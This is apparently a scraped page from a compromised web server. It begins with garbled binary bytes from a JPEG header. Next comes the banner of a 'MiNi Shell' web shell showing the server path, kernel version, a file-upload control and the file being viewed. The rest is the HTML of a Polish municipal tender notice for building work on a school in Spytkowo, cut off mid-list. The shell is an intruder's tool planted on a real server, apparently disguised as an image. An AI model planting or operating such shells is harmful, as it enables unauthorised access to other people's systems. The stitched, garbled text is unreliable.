JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20240429/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20240429/0030650801-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> „Przeprowadzenie prac konserwatorskich i budowlanych budynku Szkoły Podstawowej w <br/>Spytkowie” </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINA GIŻYCKO</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 790671225</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Mickiewicza 33</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Giżycko</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">11-500</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">warmińsko-mazurskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL623 - Ełcki</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">ugg@ugg.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.ugg.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> „Przeprowadzenie prac konserwatorskich i budowlanych budynku Szkoły Podstawowej w <br/>Spytkowie” </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-81c3f022-061b-11ef-bfd2-32fa350b5bfc</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00306508</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-04-29</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00039252/03/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.3 Przeprowadzenie prac konserwatorskich i budowlanych budynku Szkoły Podstawowej w Spytkowie</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/ugg <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Komunikacja między Wykonawcą a zamawiającym odbywa się za pośrednictwem<br/>https://platformazakupowa.pl/pn/ugg i formularza „Wyślij wiadomość do zamawiającego”.<br/>Za datę przekazania (wpływu) oświadczeń, wniosków, zawiadomień oraz informacji przyjmuje się datę ich przesłania za<br/>pośrednictwem https://platformazakupowa.pl/pn/ugg poprzez kliknięcie przycisku „Wyślij wiadomość do zamawiającego” po których<br/>pojawi się komunikat, że wiadomość została wysłana do zamawiającego.<br/>Zamawiający informuje, że instrukcje korzystania z platformazakupowa.pl dotyczące w szczególności logowania, składania<br/>wniosków o wyjaśnienie treści SWZ, składania ofert oraz innych czynności podejmowanych w niniejszym postępowaniu przy użyciu<br/>platformazakupowa.pl znajdują się w zakładce „Instrukcje dla Wykonawców&#34; na stronie internetowej pod adresem:<br/>https://platformazakupowa.pl/strona/45-instrukcje</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Zgodnie z art. 67 ustawy p.z.p.,<br/>Zamawiający podaje wymagania techniczne związane z korzystaniem z Platformy:<br/>1) stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s,<br/>2) komputer klasy PC lub MAC o następującej konfiguracji: pamięć min. 2 GB Ram, procesor Intel IV 2 GHZ lub jego nowsza wersja,<br/>jeden z systemów operacyjnych - MS Windows 7, Mac Os x 10 4, Linux, lub ich nowsze wersje,<br/>3) zainstalowana dowolna przeglądarka internetowa, w przypadku Internet Explorer minimalnie wersja 10 0.,<br/>4) włączona obsługa JavaScript,<br/>5) zainstalowany program Adobe Acrobat Reader lub inny obsługujący format plików .pdf,<br/>6) Platformazakupowa.pl działa według standardu przyjętego w komunikacji sieciowej - kodowanie UTF8,<br/>7) Oznaczenie czasu odbioru danych przez platformę zakupową stanowi datę oraz dokładny czas (hh:mm:ss) generowany wg. czasu<br/>lokalnego serwera synchronizowanego z zegarem Głównego Urzędu Miar.<br/>Ofertę oraz oświadczenia składa się, pod rygorem nieważności, w formie elektronicznej (tj. opatrzonej kwalifikowanym podpisem<br/>elektronicznym) lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym. Dokumenty te powinny być<br/>podpisane przez osobę upoważnioną do reprezentowania Wykonawcy, zgodnie z formą reprezentacji Wykonawcy określoną w<br/>rejestrze lub innym dokumencie, właściwym dla danej formy organizacyjnej Wykonawcy albo przez upełnomocnionego<br/>przedstawiciela Wykonawcy</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 Rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia<br/>27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego<br/>przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych), dalej RODO, informuję,<br/>że: Administratorem danych osobowych przetwarzanych w związku z udzieleniem zamówień publicznych jest Urząd Gminy Giżycko<br/>z siedzibą w Giżycku, przy ul Mickiewicza 33, 11-500 Giżycko, numer telefonu 87 429 99 84 lub adres email ugg@ugg.pl. We<br/>wszystkich sprawach dotyczących przetwarzania danych osobowych kontaktować się można z Inspektorem Ochrony Danych Panią<br/>Joanną Trusińską za pośrednictwem poczty e-mail: iod@ugg.pl lub pod numerem telefonu: 22 350 01 40. Celem przetwarzania<br/>danych osobowych jest przeprowadzenie procedury udzielenia zamówienia publicznego, w szczególności weryfikacja okoliczności<br/>uzasadniających wykluczenie Wykonawcy z postępowania. Podstawą prawną przetwarzania danych osobowych jest art. 6 ust. 1 lit.<br/>c) RODO, tj. przetwarzanie jest niezbędne do wypełnienia obowiązku prawnego ciążącego na administratorze. Dane osobowe<br/>przechowywane będą przez okres niezbędny do realizacji celów określonych w pkt.3 , czyli przez okres 4 lat od dnia zakończenia<br/>postępowania o udzielenie zamówienia, w przypadku wykonawców, którym Zamawiający nie udzielił zamówienia. W przypadku<br/>wykonawcy, którego oferta została wybrana jako najkorzystniejsza: okres równy okresowi gwarancji i rękojmi, nie krótszy jednak niż<br/>do dnia rozstrzygnięcia roszczeń stron. Dane osobowe są archiwizowane zgodnie z instrukcją kancelaryjną obowiązującą u<br/>administratora oraz ustawą z 14 lipca 1983 r. o narodowym zasobie archiwalnym i archiwach. Dostęp do danych osobowych mogą<br/>uzyskać organy lub podmioty upoważnione na podstawie odrębnych przepisów, a także podmioty, które na podstawie zawartych<br/>przez administratora umów, świadczą usługi związane z przetwarzaniem danych osobowych. Odbiorcami danych osobowych będą<br/>osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 18 oraz art. 74 ustawy z dnia 11<br/>września 2019 r. – Prawo zamówień publicznych.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Osoby, których dane osobowe są przetwarzane przez Urząd Gminy w Giżycku w związku<br/>z udzielaniem zamówień publicznych mają prawo do złożenia wniosku: na podstawie art. 15 RODO o dostęp do danych oraz mogą<br/>żądać od administratora informacji o celu i sposobie przetwarzania danych, przy czym w przypadku, gdy wykonanie obowiązków, o których mowa w art. 15 ust. 1-3 RODO, wymagałoby niewspółmiernie dużego wysiłku, zamawiający może żądać od osoby, której<br/>dane dotyczą, wskazania dodatkowych informacji mających na celu sprecyzowanie żądania, w szczególności podania nazwy lub<br/>daty postępowania o udzielenie zamówienia publicznego lub konkursu; na podstawie art. 16 RODO o sprostowanie (poprawienia)<br/>danych, które są nieprawidłowe lub niekompletne, przy czym skorzystanie z prawa do sprostowania lub uzupełnienia danych<br/>osobowych nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego ani zmianą postanowień umowy<br/>w zakresie niezgodnym z ustawą Prawo zamówień publicznych oraz nie może naruszać integralności protokołu oraz jego<br/>załączników; na podstawie art. 17 RODO o usunięcie danych przetwarzanych bezpodstawnie; na podstawie art. 18 RODO o<br/>ograniczenie przetwarzania, przy czym wystąpienie z żądaniem ograniczenia przetwarzania nie ogranicza przewarzania danych<br/>osobowych do czasu zakończenia postępowania o udzielenie zamówienia publicznego lub konkursu; na podstawie art. 20 RODO o<br/>przeniesienie danych do innego administratora, o ile dane przetwarzane są na podstawie zgody i w sposób zautomatyzowany. na<br/>podstawie art. 21. RODO o sprzeciw wobec przetwarzania jej danych, jeżeli podstawą przetwarzania jest interes publiczny lub<br/>prawnie uzasadniony interes administratora. Administrator nie będzie już mógł przetwarzać tych danych osobowych, chyba że<br/>wykaże, że istnienie ważnych prawnie uzasadnionych podstaw do przetwarzania danych, które według prawa uznaje się za<br/>nadrzędne wobec interesów, praw i wolności osoby, której dane dotyczą lub podstaw do ustalenia, dochodzenia lub obrony<br/>roszczeń. Gdy przetwarzanie danych odbywa się na podstawie zgody osoby, której dane dotyczą, mają Państwo prawo do cofnięcia<br/>zgody w dowolnym momencie, bez wpływu na zgodność z prawem przetwarzania, którego dokonano na podstawie zgody przed jej<br/>cofnięciem. Osoba, której dane dotyczą ma prawo wniesienia skargi do organu nadzorczego, tj. Prezesa Urzędu Ochrony Danych<br/>Osobowych, w tych przypadkach, gdy przetwarzanie danych narusza przepisy prawa. Dane nie będą przekazywane do państwa<br/>trzeciego lub organizacji międzynarodowej z wyłączeniem sytuacji wynikających z przepisów prawa. Obowiązek podania przez<br/>Wykonawcę danych osobowych osób uprawnionych do reprezentowania Wykonawcy jest wymogiem ustawowym określonym w<br/>przepisach ustawy Prawo zamówień publicznych, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego.<br/>Konsekwencje niepodania określonych danych wynikają z ustawy Prawo zamówień publicznych. Administrator nie będzie<br/>podejmować decyzji w sposób zautomatyzowany, w tym profilować przetwarzanych danych osobowych.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">RRG.271.10.2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na jedną część</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.12.) Maksymalna liczba części, jaka może zostać udzielona jednemu wykonawcy: <span class="normal">1</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zadanie 1. „Przeprowadzenie prac konserwatorskich i budowlanych budynku Szkoły <br/>Podstawowej w Spytkowie”<br/>Szczegółowy opis przedmiotu zamówienia zawiera dokumentacja projektowa/techniczna stanowiąca <br/>załącznik nr 10 do SWZ. <br/>UWAGA: W związku ze sposobem użytkowania budynku, zalecany termin wykonania prac<br/>wewnątrz budynku w okresie przerwy wakacyjnej, tj. do 31.08.2024r., tak aby umożliwić <br/>korzystanie z budynku w celu prowadzenia zajęć dydaktycznych. <br/>Przedmiary robót mają charakter wyłącznie pomocniczy w stosunku do dokumentacji służą określeniu <br/>rodzaju robót wchodzących w skład zamówienia, zaś pełen zakres robót Wykonawca zobowiązany <br/>jest określić na podstawie dokumentacji projektowej/technicznej. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45210000-2 - Roboty budowlane w zakresie budynków</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45100000-8 - Przygotowanie terenu pod budowę</p> <p class="mb-0">45300000-0 - Roboty instalacyjne w budynkach</p> <p class="mb-0">45400000-1 - Roboty wykończeniowe w zakresie obiektów budowlanych</p> <p class="mb-0">45262500-6 - Roboty murarskie i murowe</p> <p class="mb-0">45313000-4 - Instalowanie wind i ruchomych schodów</p> <p class="mb-0">45450000-6 - Roboty budowlane wykończeniowe, pozostałe</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">10 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zadanie 1<br/>1. Przy wyborze najkorzystniejszej oferty Zamawiający będzie się kierował następującymi kryteriami <br/>oceny ofert:<br/>1) Cena (C) – waga kryterium 60 %;<br/>2) Gwarancja (G) – waga kryterium 40 %.<br/>2. Zasady oceny ofert w poszczególnych kryteriach:<br/>1) Cena (C) – waga 60 %<br/> C = cena najniższa brutto*/ cena oferty ocenianej brutto x 60 pkt<br/>* spośród wszystkich złożonych ofert niepodlegających odrzuceniu<br/>a) Podstawą przyznania punktów w kryterium „cena” będzie cena ofertowa brutto podana <br/>przez Wykonawcę w Formularzu Ofertowym.<br/>b) Cena ofertowa brutto musi uwzględniać wszelkie koszty jakie Wykonawca poniesie w <br/>związku z realizacją przedmiotu zamówienia.<br/>2) Gwarancja (G) – waga 40 %<br/>Najkrótszy możliwy termin gwarancji wymagany przez Zamawiającego – 36 miesięcy.<br/>Za udzielenie gwarancji na okres:<br/>36 miesięcy wykonawca otrzyma – 0 pkt<br/>48 miesięcy wykonawca otrzyma – 20 pkt<br/>60 miesięcy wykonawca otrzyma – 40 pkt <br/>Wykonawca wpisze na druku oferty tylko jeden z powyższych terminów okresu gwarancji.<br/>W przypadku zaproponowania przez Wykonawcę okresu gwarancji wynoszącego więcej niż 60 <br/>miesięcy oceniona będzie wartość 60 miesięcy.<br/>W przypadku, kiedy wykonawca w ofercie nie zaznaczy żadnego okresu gwarancji jakości, <br/>zamawiający przyjmie, że wykonawca udziela minimalnego okresu gwarancji jakości (tj. 36 <br/>miesięcy) i przyzna wykonawcy 0 pkt.<br/>W przypadku błędnego wypełnienia oferty w zakresie udzielenia okresu gwarancji tj. wskazania <br/>innego okresu gwarancji niż: 36 miesięcy, 48 miesięcy, 60 miesięcy (z wyjątkiem zdań powyżej), <br/>to okres udzielenia gwarancji zostanie przyjęty jako 36 miesięcy i Wykonawca otrzyma taką <br/>samą liczbę punktów, jak za 36 miesięcy.<br/>3. Punktacja przyznawana ofertom w poszczególnych kryteriach oceny ofert będzie liczona z <br/>dokładnością do dwóch miejsc po przecinku, zgodnie z zasadami arytmetyki.<br/>4. W toku badania i oceny ofert Zamawiający może żądać od Wykonawcy wyjaśnień dotyczących <br/>treści złożonej oferty, w tym zaoferowanej ceny.<br/>5.Całkowita liczba punktów (L), jaką może otrzymać dana oferta, zostanie obliczona wg poniższego<br/>wzoru: L = C + G. <br/>6. Zamawiający udzieli zamówienia Wykonawcy, który uzyska największą liczbę punktów (L)</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Gwarancja</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zadanie 2. Pełnienie funkcji inspektora nadzoru nad realizacją inwestycji pn. <br/>„Przeprowadzenie prac konserwatorskich i budowlanych budynku Szkoły Podstawowej w <br/>Spytkowie”<br/>Przedmiotem niniejszego zadania jest pełnienie obowiązków Inspektora Nadzoru z ramienia <br/>Zamawiającego nad inwestycją: „Przeprowadzenie prac konserwatorskich i budowlanych <br/>budynku Szkoły Podstawowej w Spytkowie”<br/> Do obowiązków Inspektora Nadzoru należeć będzie bezpośredni nadzór nad prowadzonymi <br/>robotami w w/w zadaniu, których szczegółowy zakres określa: dokumentacja techniczna oraz <br/>przedmiary robót. W ramach jego zadania należeć będzie pełny zakres czynności, jaki dla <br/>Inspektora Nadzoru przewiduje art. 25, 26 i 27 aktualnie obowiązującej ustawy z dnia 7 lipca 1994 r. <br/>- Prawo budowlane i ponadto: <br/>a) zakres obowiązków: <br/>1) reprezentowanie inwestora na budowie przez sprawowanie kontroli zgodności jej realizacji z <br/>umową, obowiązującymi przepisami i Polskimi Normami oraz zasadami wiedzy technicznej,<br/>2) uczestniczenie w przekazaniu wykonawcy placu budowy,<br/>3) nadzorowanie wszelkich prób, badań, kontroli i sprawdzeń wymaganymi przepisami prawa,<br/>4) nadzór nad przestrzeganiem przez wykonawcę przepisów BHP łącznie z planem BIOZ,<br/>5) nadzorowanie dokonania wszelkich czynności formalnych wynikających z uzgodnień z <br/>poszczególnymi instytucjami podczas bieżącej realizacji robót,<br/>6) kontrola ilości i terminowości wykonania robót,<br/>7) nadzorowanie innych robót, które wynikają z dokumentacji,<br/>8) sprawdzenie jakości wykonanych robót, wbudowanych wyrobów, a w szczególności <br/>zapobieganie stosowania wyrobów wadliwych niedopuszczonych do obrotu i stosowania w <br/>budownictwie,<br/>9) sprawdzenie zgodności wykonanych robót z zatwierdzoną dokumentacją, standardami, <br/>projektami wykonawczymi i zasadami bezpieczeństwa,<br/>10) bieżąca kontrola jakości wykonywanych robót oraz dokumentów: atestów i świadectw jakości <br/> dla materiałów wbudowywanych, kompletowanie na bieżąco dokumentacji powykonawczej,<br/>11) sprawdzenie zgodności urządzeń, materiałów i elementów z wymaganymi certyfikatami i <br/> świadectwami wyrobów, deklaracjami zgodności,<br/>12) sprawdzanie i odbiór robót zanikających lub ulegających zakryciu, uczestniczenie w próbach <br/>i odbiorach technicznych oraz przygotowanie i udział w odbiorze robót,<br/>13) przedkładanie na bieżąco dokumentacji fotograficznej w wersji elektronicznej z wykonanych <br/>robót budowlanych ulegających zakryciu lub zanikających,<br/>14) potwierdzenie faktycznie wykonanych prac oraz usunięcia wad,<br/>15) wydawanie kierownikowi budowy poleceń, potwierdzonych wpisem do dziennika budowy,<br/>16) żądanie od kierownika budowy dokonania poprawek bądź ponownego wykonania wadliwie <br/>wykonanych prac, a także wstrzymania dalszych robót w przypadku, gdyby ich kontynuacja <br/>wywoływała zagrożenia bądź powodowała niedopuszczalną niezgodność z projektem,<br/>17) nadzorowanie doprowadzenia obiektu oraz terenu budowy do stanu z przed rozpoczęcia robót <br/>budowlanych,<br/>18) obecność na budowie potwierdzona wpisem do dziennika budowy, w tym udział w spotkaniach <br/>i naradach dotyczących realizacji robót;<br/>19) bieżąca kontrola wykonania i sprawdzenie dokumentacji powykonawczej,<br/>20) prowadzenie nadzoru inwestorskiego, w przypadku wystąpienia robót dodatkowych, <br/>zamiennych, bez żądania dodatkowego wynagrodzenia,<br/>21) nadzorowanie wykonania dokumentacji powykonawczej,<br/>22) żądanie od wykonawcy robót dołączenia do protokołu odbioru robót budowlanych, <br/>stanowiącego załącznik do faktury, deklaracji zgodności, certyfikatów na zastosowane <br/>materiały, dowodów dopuszczenia do stosowania w budownictwie wyrobów budowlanych i <br/>urządzeń technicznych występujących w tych protokołach;<br/>23) sprawdzenie dokumentów przedłożonych przez Wykonawcę do odbiorów częściowych i <br/>odbioru końcowego,<br/>24) weryfikacja dokumentów złożonych przez Wykonawcę robót budowlanych dotyczących <br/>ewentualnej 